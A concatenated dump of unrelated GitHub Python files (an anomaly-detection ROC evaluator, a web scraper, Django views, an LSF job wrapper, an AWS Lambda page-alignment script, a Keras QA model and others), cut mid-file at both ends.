plt.savefig(save_path)\r\n # plt.show()\r\n\r\n\r\ndef make_detect_accuracy(normal_file, anomaly_file, plot_save, accuracy_save):\r\n \"\"\"\r\n\r\n Args:\r\n normal_file:\r\n anomaly_file:\r\n plot_save:\r\n accuracy_save:\r\n \"\"\"\r\n normal_score = pd.read_csv(normal_file,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n anomaly_score = pd.read_csv(anomaly_file,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n dataset = make_roc_dataset(normal_score, anomaly_score)\r\n print(dataset.y.to_list())\r\n print(dataset.score.to_list())\r\n fprs, tprs, thres = metrics.roc_curve(\r\n dataset.y.to_list(), dataset.score.to_list())\r\n\r\n\r\n roc_curve_data = {\"fprs\": fprs, \"tprs\": tprs, \"thres\": thres}\r\n n_avg = np.average(normal_score.values)\r\n a_avg = np.average(anomaly_score.values)\r\n cutoff_result = cutoff(dataset, fprs, tprs, thres, n_avg, a_avg)\r\n\r\n cutoff_result_df = pd.DataFrame.from_dict(cutoff_result, orient='index').T\r\n os.makedirs(os.path.dirname(accuracy_save), exist_ok=True)\r\n cutoff_result_df.to_csv(accuracy_save, index=False)\r\n # print(cutoff_result)\r\n plot_roc_curve(roc_curve_data, plot_save)\r\n # roc_curve_datas.append[{\"fpr\": fpr, \"tpr\": tpr, \"thres\": thres}]\r\n\r\n\r\ndef arg_parse():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"-n\",\r\n \"--normal\",\r\n default=\"output/experiments/score/acanogan/5032AB_normal.csv\",\r\n help=\"Normal data score File\")\r\n parser.add_argument(\r\n \"-a\",\r\n \"--anomaly\",\r\n default=\"output/experiments/score/acanogan/5032AB_anomaly.csv\",\r\n help=\"Anomaly data score File\")\r\n parser.add_argument(\r\n \"-ms\",\r\n \"--roc_save\",\r\n default=\"output/experiments/roc_curve/5032AB.png\",\r\n help=\"File to save the roc curve\")\r\n parser.add_argument(\r\n \"-as\",\r\n \"--accuracy_save\",\r\n default=\"output/experiments/accuracy/5032AB.csv\",\r\n help=\"File to save the roc accuracy\")\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef main():\r\n args = arg_parse()\r\n make_detect_accuracy(\r\n args.normal,\r\n args.anomaly,\r\n args.roc_save,\r\n args.accuracy_save)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"mine1217/acgan_anomaly_detection","sub_path":"src/experiments/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31562083130","text":"def simple():\r\n for i in range(10):\r\n if(i%2==0):\r\n yield i \r\n\r\n#function call using for loop \r\nfor i in simple():\r\n print(i)\r\n\r\nprint(\"\\n multiple yeild \\n\" )\r\n\r\ndef abc():\r\n str1=\"first string\"\r\n yield str1\r\n \r\n str2=\"second string\"\r\n yield str2\r\n\r\n str3=\"third string\"\r\n yield str3\r\n\r\nb=abc()\r\nprint(next(b))\r\nprint(next(b))\r\nprint(next(b))\r\n","repo_name":"Pournimaprabhune/python","sub_path":"114_generator1.py","file_name":"114_generator1.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24815861783","text":"#!/usr/bin/env python3\n\n\n# 1st-party\nimport collections\nimport csv\nimport json\nimport logging\nimport os\nimport sys\n\n# 2nd-party\nimport package_cache\nimport translation_cache\n\n# Data source 3: A map of a project to the date (not time) of when it last\n# added, updated or removed a package.\nPACKAGE_LAST_MODIFIED_FILENAME = '/var/experiments-output/package_cache.json'\n\n# The time since the hypothetical compromise began (i.e. since the download log\n# began).\nSINCE_TIMESTAMP = 1395360000\n\n\n# this script will traverse the filename in the format of sorted.simple.log\n# and count the instances of every package request that occurred. \ndef sort_packages_by_popularity(filename):\n packages = collections.Counter()\n\n # Zero counters for all projects estimated to exist before compromise.\n with open(PACKAGE_LAST_MODIFIED_FILENAME, 'rt') as fp:\n packages_list = json.load(fp)\n\n for package in packages_list:\n # Get timestamps of when the project added/updated/removed a package.\n timestamps = packages_list[package]\n timestamp = \\\n package_cache.get_last_timestamp_before_compromise(timestamps,\n SINCE_TIMESTAMP)\n\n # This project was updated sometime before compromise.\n # That means this project can be included in the set of projects that\n # existed before compromise, giving us a better estimate of the true\n # number of projects that existed just before compromise.\n if timestamp:\n assert timestamp < SINCE_TIMESTAMP\n packages[package] = 0\n\n logging.info('# of projects estimated to exist before compromise: {:,}'\\\n .format(len(packages)))\n\n # Now count the popularity of packages that were actually downloaded.\n # NOTE: This is extremely biased towards the compromise period, but we have\n # no better data. Must note in paper.\n with open(filename, 'rt') as simple_log:\n requests = csv.reader(simple_log)\n\n for timestamp, anonymized_ip, request, user_agent in requests:\n package_name = translation_cache.infer_package_name(request)\n assert package_name\n assert len(package_name) > 0, request\n packages[package_name] += 1\n\n # order the dictionary\n logging.info('total # projects seen to exist after compromise: {:,}'\\\n .format(len(packages)))\n\n with open('/var/experiments-output/packages_by_popularity.txt', 'wt') as \\\n ordered_packages_file:\n for package, count in packages.most_common():\n assert len(package) > 0\n ordered_packages_file.write(\"{},{}\\n\".format(package, count))\n\n\nif __name__ == '__main__':\n # rw for owner and group but not others\n os.umask(0o07)\n\n assert len(sys.argv) == 2\n log_filename = sys.argv[1]\n\n sort_packages_by_popularity(log_filename)\n\n\n","repo_name":"trishankkarthik/diplomat-experiments","sub_path":"packages_by_popularity.py","file_name":"packages_by_popularity.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"6174861477","text":"import requests\nfrom bs4 import BeautifulSoup\n\nkey = {\n 'start':0\n}\nwith open('musicTop250.txt','a+',encoding='utf-8') as f:\n for i in range(10):\n r = requests.get('https://music.douban.com/top250',timeout=20,params=key)\n soup = BeautifulSoup(r.text,\"lxml\")\n \"\"\"\n 搜索文档法:find()\\find_all()\n \"\"\"\n boxs = soup.find_all('div',class_='pl2') \n for box in boxs:\n \"\"\"\n 选择器方法:select()\n \"\"\"\n album_name = box.select('a:nth-child(1)')[0].text.strip()\n album_info = box.select('p.pl')[0].text.strip()\n album_rating = box.select('span.rating_nums')[0].text.strip()\n f.write('名称:'+ album_name + ' 信息:' + album_info + ' 评分:'+album_rating+'\\n')\n key['start'] = key['start'] + 25\n","repo_name":"BooleanlN/crawlers","sub_path":"chapter1/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9940178285","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import ArtForm\nfrom django.db import transaction\nfrom .models import Category, Artwork, ArtLike\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import authenticate\n\n\ndef upload_view(request):\n if request.method == \"POST\":\n form = ArtForm(request.POST, request.FILES, user=request.user)\n if form.is_valid():\n with transaction.atomic():\n form.save()\n return redirect('/')\n else:\n form = ArtForm(user=request.user)\n context = {\n \"form\":form,\n }\n return render(request, 'artworks/upload_art.html', context)\n\n\ndef like_view(request, art_id):\n user = request.user\n if user.is_authenticated:\n artwork = Artwork.objects.get(pk=art_id)\n if artwork.likes.filter(id=user.id).exists():\n artwork.likes.remove(user)\n else:\n artwork.likes.add(user)\n return HttpResponseRedirect(reverse('artworks:art_view', args=(art_id,)))\n return redirect('/login')\n\n\ndef swipe_like_view(request, art_id):\n if request.user.is_authenticated:\n artwork = Artwork.objects.get(pk=art_id)\n artwork.likes.add(request.user)\n return HttpResponseRedirect('/')\n\n\ndef art_view(request, art_id):\n artwork = Artwork.objects.get(pk=art_id)\n liked = artwork.likes.filter(id=request.user.id).exists()\n categories = artwork.category.all()\n context = {\n \"artwork\":artwork,\n \"artist\": artwork.uploader,\n \"liked\":liked,\n \"categories\":categories,\n }\n return render(request, 'artworks/art_view.html', context)\n\n","repo_name":"Fiphee/art_web_app","sub_path":"artworks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21397022789","text":"import random\nfrom typing import Dict, Callable\n\n\nclass JobEntrypoint:\n def perform(self, x: float, y: float) -> float:\n \"\"\"\n Add numbers.\n :param x: First element to add.\n :param y: Second element to add.\n :return: Sum of the numbers.\n \"\"\"\n return x + y\n\n def auxiliary_endpoints(self) -> Dict[str, Callable]:\n \"\"\"Dict of custom endpoint paths (besides \"/perform\") handled by Entrypoint methods\"\"\"\n return {\n '/explain': self.explain,\n '/random': self.random,\n }\n\n def explain(self, x: float, y: float) -> Dict[str, float]:\n \"\"\"\n Explain feature importance of a model result.\n :param x: First element to add.\n :param y: Second element to add.\n :return: Dict of feature importance.\n \"\"\"\n result = self.perform(x, y)\n return {'x_importance': x / result, 'y_importance': y / result}\n\n def random(self, start: float, end: float) -> float:\n \"\"\"Return random number within a range\"\"\"\n return random.uniform(start, end)\n\n def docs_input_examples(self) -> Dict[str, Dict]:\n \"\"\"Return mapping of Job's endpoints to corresponding exemplary inputs.\"\"\"\n return {\n '/perform': {\n 'x': 40,\n 'y': 2,\n },\n '/explain': {\n 'x': 1,\n 'y': 2,\n },\n '/random': {\n 'start': 0,\n 'end': 10,\n },\n }\n","repo_name":"TheRacetrack/racetrack","sub_path":"sample/python-auxiliary-endpoints/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"6"} +{"seq_id":"41071023782","text":"#! /usr/bin/python2.7\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef histo(dataIn, weights=None, bins=32, range_=(0,256)):\n histo, bins = np.histogram(dataIn, bins, range_, weights=weights)\n #histo = histo/ histo.sum()\n return histo, bins\n\n# Affiche un histogramme cree par numpy\ndef plotHist(dataIn):\n plt.hist(dataIn)\n plt.show()\n\n\n\n# Retourne l'index du bin auquel appartient la couleur\ndef bin_please(couleur,bins):\n result = []\n for i,coul in enumerate(couleur):\n tmp = (bins <= coul)*1\n result.append(tmp.sum()-1)\n return result\n \n# Version optimisee python (mais qui prend plus de temps que la precedente ...)\ndef bin_please_opt(couleur,bins):\n couleur = np.reshape(couleur,(len(couleur),1))\n bins = np.meshgrid(bins,np.arange(couleur.shape[0]))[0]\n lut = (bins <= couleur)*1\n lut = np.dot(lut,np.ones(lut.shape[1]))-1\n return lut\n \ndef bin_RGB(couleur_RGB,bins):\n #couleur_RGB = couleur_RGB.astype(float)\n index_R = bin_please(couleur_RGB[0],bins)\n index_G = bin_please(couleur_RGB[1],bins)\n index_B = bin_please(couleur_RGB[2],bins)\n return [index_R, index_G, index_B] \n\n##############################################################################\n################################ TESTS ############################\n##############################################################################\n\nif __name__ == \"__main__\":\n import time\n \n\n\n \n \n","repo_name":"TheDudesGhost/Tracking","sub_path":"mean_shift/base/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30292158697","text":"#!/usr/bin/env python\n'''\nSnakemake helper script for LSF support\n'''\nimport argparse\nimport subprocess\nimport re\nimport time\nimport pathlib\n\nparser = argparse.ArgumentParser(description=\"Runs bsub but watches to make sure the job is successfully submitted and quits if it doesn't start soon enough.\")\nparser.add_argument(\"--timeout\", help=\"time in seconds to wait until giving up watching for the job to enter RUN state\", default=30, type=int)\nparser.add_argument(\"-M\", \"--memory\", help=\"memory limit in MB\", default=12000, type=int)\nparser.add_argument(\"command\", help=\"command to pass to bsub to run\", nargs=argparse.REMAINDER)\n\nargs = parser.parse_args()\n\nimport random\ntemp_num = random.randint(0, 1_000_000)\ntemp_file = pathlib.Path(f\"log/tsub/tmp.{temp_num}.started\")\ntemp_file.touch()\n\n# Run the command\nwith open(temp_file, \"w\") as temp:\n command = \"bsub \" + f'-M {args.memory} -R \"rusage [mem={args.memory}]\" '+ ' '.join(args.command)\n temp.write(\"Running:\\n\")\n temp.write(command)\n try:\n result = subprocess.run(command, shell=True, check=True, stdout=subprocess.PIPE)\n except subprocess.CalledProcessError:\n temp.write(\"CALLED BSUB COMMAND FAILED\")\n temp.write(result.stdout.decode())\n\nm = re.match(\"Job <([\\d]+)> is submitted to\", result.stdout.decode())\nif m:\n job_id = m.groups()[0]\n print(job_id)\n temp_file.unlink()\n exit(0)\n \n for i in range(args.timeout):\n time.sleep(1)\n bjobs_result = subprocess.run(f\"bjobs {job_id}\", shell=True, check=True, stdout=subprocess.PIPE)\n if bjobs_result.stdout.decode().endswith(\"is not found\"):\n continue\n else:\n lines = bjobs_result.stdout.decode().splitlines()\n if len(lines) < 2:\n continue\n\n _job_id, user, stat, queue, *rest = lines[1].split()\n if _job_id == job_id:\n if stat == \"RUN\":\n print(job_id)\n #print(f\"Job {job_id} started running successfully after {i} seconds\")\n temp_file.unlink()\n exit(0)\n elif stat == \"PEND\":\n print(job_id)\n #print(f\"Job {job_id} queued successfully after {i} seconds\")\n temp_file.unlink()\n exit(0)\n else:\n #print(f\"Job {job_id} in queue with status {stat}\")\n continue\n print(\"Never saw the job in the RUN or PEND state in queue\")\n\n # Can't actually do the following since it bhist needs to be on node\n ## Check bhist in case it did run but finished very quickly\n #bhist_result = subprocess.run(f\"bhist {job_id}\", shell=True, check=True, stdout=subprocess.PIPE)\n #if bhist_result.stdout.decode().startswith(\"No matching job found\"):\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n #else:\n # lines = bhist_result.stdout.decode().splitlines()\n # if len(lines) < 2:\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n # else:\n # _job_id, user, name, *rest = lines[1].split()\n # if _job_id == job_id:\n # print(\"Found job in bhist, assuming it successfully started running\")\n # exit(0)\n # else:\n # print(\"No trace of the job to be found in bhist either. Declaring failure to submit\")\n # exit(1)\n\n exit(1)\n\nelse:\n print(\"Failed submission of job\")\n print(result.stdout.decode())\n exit(1)\n","repo_name":"tgbrooks/ukbb","sub_path":"tsub.py","file_name":"tsub.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"41404365846","text":"from __future__ import print_function\nimport traceback\nimport boto3\nimport copy\nimport cv2\nimport numpy as np\nimport json\nimport urllib.parse\nfrom skimage.filters import threshold_yen\nfrom skimage.exposure import rescale_intensity\n\nMAX_MATCHES = 500\nGOOD_MATCH_PERCENT = 0.15\ns3 = boto3.client('s3')\n#dynamodb = boto3.client('dynamodb')\n# This function is triggered by a page being inserted into a bucket.\n# The key of the image is used to pull a template.\ndef perspectiveFixRequest(event, context):\n\n #print(\"Received event: \" + json.dumps(event, indent=2))\n # What we hope to return.\n response = {\n \"success\": False,\n \"message\": \"h.g v2.0!\"\n }\n # Tasks\n # Triggered by S3 upload event to raw_images\n try:\n for record in event['Records']:\n # The S3 bucket\n bucket = record['s3']['bucket']['name']\n \n # Folder format is raw_assets/game/page/uuid. (jpg or jpeg or png)\n key = urllib.parse.unquote_plus( record['s3']['object']['key'], encoding='utf-8' )\n \n # Fetch Image\n page = s3.get_object(Bucket=bucket, Key=key)\n\n # page['Body'] is the image. Always .jpg\n # obj to cv2\n nparr = np.frombuffer( page['Body'].read(), np.uint8 )\n image = cv2.imdecode( nparr, cv2.IMREAD_COLOR )\n \n # Split the url into parts so we know where the model lives.\n # 1 is the minigame, 2 is the page, 3 is the uuid\n key_parts = key.split(\"/\")\n minigame = key_parts[1]\n model_id = key_parts[2]\n image_id = key_parts[3].split(\".\")[0]\n\n # Fetch the page model for alignment.\n model_base = minigame + '/' + model_id\n model_bucket = 'humanities.games.page.models'\n page_model = s3.get_object( Bucket=model_bucket, Key=model_base+'.jpg' )\n model_nparr = np.frombuffer( page_model['Body'].read(), np.uint8 )\n model_image = cv2.imdecode( model_nparr, cv2.IMREAD_COLOR )\n\n # Fetch the page data for transforms.\n page_data_file = s3.get_object( Bucket=model_bucket, Key=model_base+'.json' )\n page_data_string = page_data_file[\"Body\"].read().decode('utf-8')\n page_data = json.loads( page_data_string )\n \n\n # Align the page\n aligned_page = align_images( image, model_image )\n aligned_page = white_balance( aligned_page );\n\n # Locate and save the drawings.\n found_art = find_art( aligned_page, page_data, image_id, minigame, model_id, record );\n \n table = boto3.resource('dynamodb').Table('HG_API_PageStatus')\n # Update Dynamo Status to Complete based on UUID TODO.\n table.update_item(\n Key={\n 'SubmissionID': image_id\n },\n UpdateExpression=\"set ProcessStep = :s, FoundArt = :a\",\n ExpressionAttributeValues={\n ':s': \"complete\",\n ':a': found_art\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"saved to dynamo\")\n\n except Exception:\n # Caught but with error\n errorTrace = traceback.format_exc()\n print(errorTrace)\n finally:\n result = {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n return result\n\ndef white_balance(img):\n result = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n avg_a = np.average(result[:, :, 1])\n avg_b = np.average(result[:, :, 2])\n result[:, :, 1] = result[:, :, 1] - ((avg_a - 128) * (result[:, :, 0] / 255.0) * 1.1)\n result[:, :, 2] = result[:, :, 2] - ((avg_b - 128) * (result[:, :, 0] / 255.0) * 1.1)\n result = cv2.cvtColor(result, cv2.COLOR_LAB2BGR)\n return result\n\ndef align_images(im1, im2):\n\n # Convert images to grayscale\n im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n \n # Detect ORB features and compute descriptors.\n orb = cv2.ORB_create(MAX_MATCHES)\n keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n descriptors1 = np.array(descriptors1)\n descriptors2 = np.array(descriptors2)\n\n # Match features.\n matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n # Match descriptors.\n matches = matcher.match(descriptors1,descriptors2, None)\n # Sort them in the order of their distance.\n matches = sorted(matches, key = lambda x:x.distance)\n\n # Sort matches by score\n #matches.sort(key=lambda x: x.distance, reverse=False)\n\n # Remove poor matches\n numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)\n matches = matches[:numGoodMatches]\n\n # Draw top matches (local use)\n #imMatches = cv2.drawMatches(im1, keypoints1, im2, keypoints2, matches, None)\n #cv2.imwrite(\"hg-matches.jpg\", imMatches)\n \n # Extract location of good matches\n points1 = np.zeros((len(matches), 2), dtype=np.float32)\n points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n for i, match in enumerate(matches):\n points1[i, :] = keypoints1[match.queryIdx].pt\n points2[i, :] = keypoints2[match.trainIdx].pt\n \n # Find homography\n h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)\n\n # Use homography\n height, width, channels = im2.shape\n im1Reg = cv2.warpPerspective(im1, h, (width, height))\n \n return im1Reg\n\ndef parse_transforms( image, block ):\n #transform\n if( block['rotate'] == \"left\" ) :\n image = cv2.rotate( image, cv2.ROTATE_90_COUNTERCLOCKWISE )\n\n if( block['rotate'] == \"right\" ) :\n image = cv2.rotate( image, cv2.ROTATE_90_CLOCKWISE )\n\n #resize\n new_size = ( block['scaleX'], block['scaleY'] )\n resized = cv2.resize( image, new_size, interpolation = cv2.INTER_AREA )\n return resized\n\ndef scale_contour( cnt, scale ):\n M = cv2.moments(cnt)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n cnt_norm = cnt - [cx, cy]\n cnt_scaled = cnt_norm * scale\n cnt_scaled = cnt_scaled + [cx, cy]\n cnt_scaled = cnt_scaled.astype(np.int32)\n return cnt_scaled\n\ndef remove_paper( image ):\n # add padding\n image = cv2.copyMakeBorder(image,10,10,10,10,cv2.BORDER_CONSTANT,value=[255,255,255])\n # converting image into grayscale image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n \n # setting threshold of gray image\n _, threshold = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n i = 0\n largestContourArea = 0\n largestContour = 0\n for cnt in contours:\n # findcontour function detects whole image as shape\n if i == 0:\n i = 1\n continue\n\n contourArea = cv2.contourArea(cnt)\n if( contourArea > largestContourArea):\n largestContour = cnt\n largestContourArea = contourArea\n\n if not isinstance( largestContour, int ):\n mask = np.zeros_like(image) # Create mask where white is what we want, black otherwise\n cv2.drawContours(image=mask, contours=[largestContour], contourIdx=-1, color=(255,255,255), thickness=-1) # Draw filled contour in mask\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n transparent = np.zeros((image.shape[0], image.shape[1], 4), dtype=np.uint8)\n transparent[:,:,0:3] = image\n transparent[:, :, 3] = mask\n\n return transparent\n return image\n\n\ndef find_art( image, page_data, image_id, minigame, model_id, record ):\n\n #Save what is completed to an array\n completed = []\n completed_dict = {}\n #make a gray version\n gray = cv2.cvtColor( image, cv2.COLOR_BGR2GRAY )\n # setting threshold of gray image\n _, threshold = cv2.threshold( gray, 127, 255, cv2.THRESH_BINARY )\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE )\n \n i = 0\n total = len( page_data['blocks'] )\n # Find the biggest shapes.\n sorted_contours = sorted( contours, key=lambda x: cv2.contourArea(x), reverse=True )\n\n # Stored for later\n bucket = record['s3']['bucket']['name']\n image_key_base = 'processed/'+ minigame + '/' + model_id + '/' + image_id + '/'\n # was 40000 3-21-22\n threshold_area = 5000 #threshold area\n # list for storing names of shapes\n for contour in sorted_contours:\n \n # here we are ignoring first counter because \n # findcontour function detects whole image as shape\n if i == 0:\n i = 1\n continue\n\n # quit if we are done.\n if len(completed_dict) >= total:\n break\n # cv2.approxPloyDP() function to approximate the shape\n approx = cv2.approxPolyDP(\n contour, 0.01 * cv2.arcLength(contour, True), True)\n \n area = cv2.contourArea(contour)\n # Catch the biggest squares\n print( str(len(completed_dict)) + \" of \" + str(total) )\n if ( len(approx) == 4 ) and (area > threshold_area) and ( len(completed_dict) < total ):\n # use a point from page_data to determine which block \n file_name = 'not-found'\n #see which contour \n for block in page_data['blocks']:\n #is our known point inside the found box?\n result = cv2.pointPolygonTest(contour, ( block['centerX'], block['centerY'] ), False)\n if result > 0 :\n newBlock = copy.deepcopy( block )\n file_name = newBlock['file_name']\n print( file_name + \" found.\" )\n # page_data['blocks'][ index ]['found'] = True;\n # Scale the contour to try to remove the black border.\n # .933 was the original working param here.\n cnt = scale_contour( contour, .933 )\n x,y,w,h = cv2.boundingRect( cnt )\n cropped = image[y:y+h, x:x+w]\n if block['make_transparent'] == True:\n # format for js\n newBlock['make_transparent'] = 'true'\n # remove the paper\n cropped = remove_paper( cropped )\n final = parse_transforms( cropped, newBlock )\n not_empty, rect = check_not_empty( final, file_name )\n if not_empty == True :\n # save to s3. The rect is for use with collision detection.\n image_string = cv2.imencode( '.png', final, [int(cv2.IMWRITE_PNG_COMPRESSION),9] )[1].tostring()\n s3.put_object(Bucket=bucket, Key=image_key_base + file_name + '.png', Body=image_string)\n newBlock[ 'bounds' ] = rect\n completed_dict[ file_name ] = newBlock;\n #completed.append( json.dumps( newBlock, separators=(',', ':') ) )\n else:\n # format for js\n newBlock['make_transparent'] = 'false'\n # No transparency, let us save on file size\n final = parse_transforms( cropped, newBlock )\n not_empty, rect = check_not_empty( final, file_name )\n if not_empty == True :\n # save to s3. We disregard the rect for jpg\n image_string = cv2.imencode( '.jpg', final, [cv2.IMWRITE_JPEG_QUALITY, 90] )[1].tostring()\n s3.put_object(Bucket=bucket, Key=image_key_base + file_name + '.jpg', Body=image_string)\n completed_dict[ file_name ] = newBlock;\n #completed.append( json.dumps( newBlock, separators=(',', ':') ) )\n # Theoretically it takes the smallest match.\n for key in completed_dict:\n completed.append( json.dumps( completed_dict[ key ], separators=(',', ':') ) )\n return completed\n\ndef check_not_empty( image, file_name ):\n #make a gray version\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # setting threshold of gray image\n _, threshold = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n \n # using a findContours() function\n contours, _ = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Small pencil marks etc TODO may require scale checking if not empty\n threshold_area = 1000 \n real_image = False\n\n if len(contours) <= 1 :\n # 1 is the whole image, so this is functionally blank.\n print( file_name + \" is blank.\" )\n return False, {}\n else:\n # At least two, so something is in the box.\n largest_mark = sorted( contours, key=lambda x: cv2.contourArea(x), reverse=True )[ 1 ]\n area = cv2.contourArea( largest_mark )\n\n # Check if it is a big enough mark\n if area < threshold_area:\n print( file_name + \"- drawing too small.\" )\n return False, {}\n # big enough, return bounding rect as array for collision detection \n x,y,w,h = cv2.boundingRect( largest_mark )\n rect = { \"x\" : x, \"y\" : y, \"width\" : w, \"height\": h }\n return True, rect\n\ndef brightness_and_contrast( image, gray ):\n\n clip_hist_percent = 1\n # Calculate grayscale histogram\n hist = cv2.calcHist([gray],[0],None,[256],[0,256])\n hist_size = len(hist)\n\n # Calculate cumulative distribution from the histogram\n accumulator = []\n accumulator.append(float(hist[0]))\n for index in range(1, hist_size):\n accumulator.append(accumulator[index -1] + float(hist[index]))\n\n # Locate points to clip\n maximum = accumulator[-1]\n clip_hist_percent *= (maximum/100.0)\n clip_hist_percent /= 2.0\n\n # Locate left cut\n minimum_gray = 0\n while accumulator[minimum_gray] < clip_hist_percent:\n minimum_gray += 1\n\n # Locate right cut\n maximum_gray = hist_size -1\n while accumulator[maximum_gray] >= (maximum - clip_hist_percent):\n maximum_gray -= 1\n\n # Calculate alpha and beta values\n alpha = 255 / (maximum_gray - minimum_gray)\n beta = -minimum_gray * alpha\n\n # Creates whiter background\n auto_result = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)\n\n return auto_result\n\n\n \n\n","repo_name":"spark-media/humanities-games-paper-packet-api","sub_path":"page-process-aws-container/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73491922108","text":"class Solution:\n def productExceptSelf(self, nums):\n prod = 1\n l = len(nums)\n output = [None] * l\n\n for i, n in enumerate(nums):\n output[i] = prod\n prod *= n\n\n prod = 1\n for i in range(l):\n output[l-1-i] = output[l-1-i] * prod\n prod = prod * nums[l-1-i]\n\n return output\n \n\ns = Solution()\nprint(s.productExceptSelf([0, 1]))\n\n","repo_name":"ishmam-hossain/problem-solving","sub_path":"leetcode/238_product_array_except_self.py","file_name":"238_product_array_except_self.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"41027375725","text":"from training import training, setting, w2v\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\nset_session(tf.Session(config=config))\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.models import *\n\nquest_input = Input(shape=(setting.query_len,), dtype='int32', name='quest_word_input')\ncand_input = Input(shape=(setting.passage_len,), dtype='int32', name='passage_word_input')\n\nquestC_input = Input(shape=(setting.query_len, setting.word_len), dtype='int32', name='quest_char_input')\ncandC_input = Input(shape=(setting.passage_len, setting.word_len), dtype='int32', name='passage_char_input')\n\nquestA_input = Input(shape=(setting.query_len, 2), name='quest_word_feature_input')\ncandA_input = Input(shape=(setting.passage_len, 4), name='passage_word_feature_input')\n\nquestAc_input = Input(shape=(setting.query_len, setting.word_len, 1), name='quest_char_feature_input')\ncandAc_input = Input(shape=(setting.passage_len, setting.word_len, 1), name='passage_char_feature_input')\n\n\ndef MaskWord(x, dropout=0.2):\n # Mask to 1\n mask = K.cast(K.random_uniform(K.shape(x)) < dropout, 'float32')\n mask = K.cast(K.not_equal(x, 0), 'float32') * mask\n xm = K.cast(x, 'float32') * (1 - mask) + mask\n return K.in_train_phase(K.cast(xm, 'int32'), K.cast(x, 'int32'))\n\n\nMaskWordLayer = Lambda(MaskWord)\n\nqi = MaskWordLayer(quest_input)\nci = MaskWordLayer(cand_input)\nqci = MaskWordLayer(questC_input)\ncci = MaskWordLayer(candC_input)\n\n\nembed_layer = Embedding(setting.nwords, setting.w_emb_size, weights=[w2v], trainable=True)\nquest_emb = Dropout(setting.dropout_rate, (None, 1, None))( embed_layer(quest_input) )\ncand_emb = Dropout(setting.dropout_rate, (None, 1, None))( embed_layer(cand_input) )\n\ncembed_layer = Embedding(setting.nchars + 2, setting.c_emb_size)\n\n\nchar_input = Input(shape=(setting.word_len,), dtype='int32')\nc_emb = Dropout(setting.dropout_rate, (None, 1, None))( cembed_layer(char_input) )\ncmask = Lambda(lambda x:K.cast(K.not_equal(x, 0), 'float32'))(char_input)\ncc = Conv1D(setting.c_emb_size, 3, padding='same')(c_emb)\ncc = LeakyReLU()(cc)\ncc = multiply([cc, Reshape((-1,1))(cmask)])\ncc = Lambda(lambda x:K.sum(x, 1))(cc)\nchar_model = Model(char_input, cc)\n\nqc_emb = TimeDistributed(char_model)(qci)\ncc_emb = TimeDistributed(char_model)(cci)\n\nquest_emb = concatenate([quest_emb, qc_emb, 